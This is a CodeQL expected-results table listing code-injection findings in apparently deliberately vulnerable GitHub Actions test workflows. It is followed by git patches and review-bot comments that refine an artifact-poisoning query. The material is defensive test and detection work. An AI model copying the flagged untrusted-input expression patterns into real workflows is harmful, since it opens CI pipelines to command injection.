github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | From f7ddd8b769f64dc375ad140d8f137e3ea3ea822a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 15:39:50 +0200 Subject: [PATCH 0146/1267] Include problem queries in actions-all suite --- ql/src/codeql-suites/actions-all.qls | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls index 8c0f580a7ad..32b9b5800cd 100644 --- a/ql/src/codeql-suites/actions-all.qls +++ b/ql/src/codeql-suites/actions-all.qls @@ -2,4 +2,5 @@ - queries: . - include: kind: - - path-problem + - problem + - path-problem From ce5928c6bac0a49e245ff88503bb37612909bd16 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 15:43:43 +0200 Subject: [PATCH 0147/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e99a12dda08..f689f38ef52 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.5 +version: 0.0.6 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e37339e16cb..f2ce850e5b8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.5 +version: 0.0.6 groups: - actions - queries From 28ccf4fa68ffb178976a679c7ca62f2fee3b2305 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Apr 2024 09:18:01 +0200 Subject: [PATCH 0148/1267] Improve Artifact Poisoning query --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 9 + .../security/ArtifactPoisoningQuery.qll | 183 ++++++++++++++++-- .../actions/security/EnvVarInjectionQuery.qll | 4 +- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 13 +- ql/test/library-tests/test.expected | 4 + .../.github/workflows/artifactpoisoning11.yml | 41 ++++ ...poisoning1.yml => artifactpoisoning12.yml} | 10 +- ...poisoning3.yml => artifactpoisoning21.yml} | 10 +- ...poisoning2.yml => artifactpoisoning22.yml} | 2 +- .../.github/workflows/artifactpoisoning31.yml | 22 +++ .../.github/workflows/artifactpoisoning32.yml | 21 ++ .../.github/workflows/artifactpoisoning33.yml | 21 ++ .../.github/workflows/artifactpoisoning41.yml | 25 +++ ...poisoning4.yml => artifactpoisoning42.yml} | 4 +- .../.github/workflows/artifactpoisoning51.yml | 24 +++ .../CWE-829/ArtifactPoisoning.expected | 14 +- .../CWE-829/UnpinnedActionsTag.expected | 3 +- 18 files changed, 372 insertions(+), 40 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning1.yml => artifactpoisoning12.yml} (73%) rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning3.yml => artifactpoisoning21.yml} (51%) rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning2.yml => artifactpoisoning22.yml} (94%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml rename 
ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning4.yml => artifactpoisoning42.yml} (89%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 17768245fdc..720fd29feb0 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -225,6 +225,8 @@ class Step extends AstNode instanceof StepImpl { Env getEnv() { result = super.getEnv() } If getIf() { result = super.getIf() } + + Step getAFollowingStep() { result = super.getAFollowingStep() } } /** diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 3f9293bc972..bba5c1a47d3 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -629,6 +629,15 @@ class StepImpl extends AstNodeImpl, TStepNode { /** Gets the value of the `if` field in this step, if any. */ IfImpl getIf() { result.getNode() = n.lookup("if") } + + /** Gets a step that follows this step. */ + StepImpl getAFollowingStep() { + exists(LocalJobImpl job, int i, int j | + job.getStep(i) = this and + result = job.getStep(j) and + i < j + ) + } } class IfImpl extends AstNodeImpl, TIfNode { diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index abf36fd7da3..c64a7d0e338 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
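Review bot: `StepImpl.getAFollowingStep()` resolves ordering only through `LocalJobImpl.getStep(i)`, so a step that is not a member of a local job has no following step at all. If composite-action steps are also modelled as `StepImpl` (not visible in this hunk), the artifact-extraction lookups built on this predicate would have no result for them and the download would go unreported. The QLDoc should state that scope and that any later step qualifies, not just the next one, for example `/** Gets any step that appears later than this step in the same local job. */`. The public wrapper added to `Step` in `ql/lib/codeql/actions/Ast.qll` has no QLDoc and could carry the same sentence.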
@@ -1,13 +1,36 @@ import actions -class ArtifactDownloadStep extends Step { - ArtifactDownloadStep() { +string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } + +string unzipDirArgRegexp() { + result = "-d\\s+\"([^ ]+)\".*" or + result = "-d\\s+'([^ ]+)'.*" +} + +abstract class ArtifactDownloadStep extends Step { + abstract string getPath(); +} + +class Dawidd6ActionDownloadArtifactDownloadStep extends ArtifactDownloadStep, UsesStep { + Dawidd6ActionDownloadArtifactDownloadStep() { // eg: - uses: dawidd6/action-download-artifact@v2 - this.(UsesStep).getCallee() = "dawidd6/action-download-artifact" and - // exclude downloads outside the current directory - // TODO: add more checks to make sure the artifacts can be controlled - not exists(this.(UsesStep).getArgumentExpr("path")) - or + this.getCallee() = "dawidd6/action-download-artifact" and + // An attacker should not be able to push to local branches which `branch` normally is used for. + ( + not exists(this.getArgument("branch")) or + not this.getArgument("branch") = ["main", "master"] + ) + } + + override string getPath() { + if exists(this.getArgument("path")) then result = this.getArgument("path") else result = "" + } +} + +class ActionsGitHubScriptDownloadStep extends ArtifactDownloadStep, UsesStep { + string script; + + ActionsGitHubScriptDownloadStep() { // eg: // - uses: actions/github-script@v6 // with: 
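Review bot: `unzipDirArgRegexp()` accepts only a quoted destination (`-d "dir"` or `-d 'dir'`), so the unquoted form used by this commit's own fixture (`unzip sonarcloud-data.zip -d sonarcloud-data`) is never captured and `getPath()` falls back to `""`. `unzipRegexp()` also matches `tar`, whose destination flag is `-C` rather than `-d`, so tar extractions always take the empty-path branch. Adding an unquoted alternative such as `result = "-d\\s+([^ \"']+).*"` would let the path heuristic work for those workflows. A one-line comment on each helper saying which capture group holds the directory would also help, because callers hard-code group 2. `ActionsGitHubScriptDownloadStep` continues past the end of this hunk.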
@@ -26,16 +49,79 @@ class ArtifactDownloadStep extends Step { // artifact_id: matchArtifact.id, // archive_format: 'zip', // }); - this.(UsesStep).getCallee() = "actions/github-script" and - exists(string script | - this.(UsesStep).getArgument("script") = script and - script.matches("%listWorkflowRunArtifacts(%") and - script.matches("%downloadArtifact(%") + // var fs = require('fs'); + // fs.writeFileSync('${{github.workspace}}/test-results.zip', Buffer.from(download.data)); + this.getCallee() = "actions/github-script" and + this.getArgument("script") = script and + script.matches("%listWorkflowRunArtifacts(%") and + script.matches("%downloadArtifact(%") and + script.matches("%writeFileSync%") + } + + override string getPath() { + if + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + then + result = + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + else + if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + then result = "" + else none() + } +} + +class GHRunArtifactDownloadStep extends ArtifactDownloadStep, Run { + string script; + + GHRunArtifactDownloadStep() { + // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + this.getScript() = script and + script.splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") and + script.splitAt("\n").matches("%github.event.workflow_run.id%") and + ( + script.splitAt("\n").regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) ) - or - // eg: - run: gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - this.(Run).getScript().splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") - or + } + + override string getPath() { + if + this.getAFollowingStep() + .(Run) + .getScript() + 
.splitAt("\n") + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + then + result = script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) or + result = + this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2) + else + if + this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or + script.splitAt("\n").regexpMatch(unzipRegexp()) + then result = "" + else none() + } +} + +class DirectArtifactDownloadStep extends ArtifactDownloadStep, Run { + string script; + + DirectArtifactDownloadStep() { // eg: // run: | // artifacts_url=${{ github.event.workflow_run.artifacts_url }} 
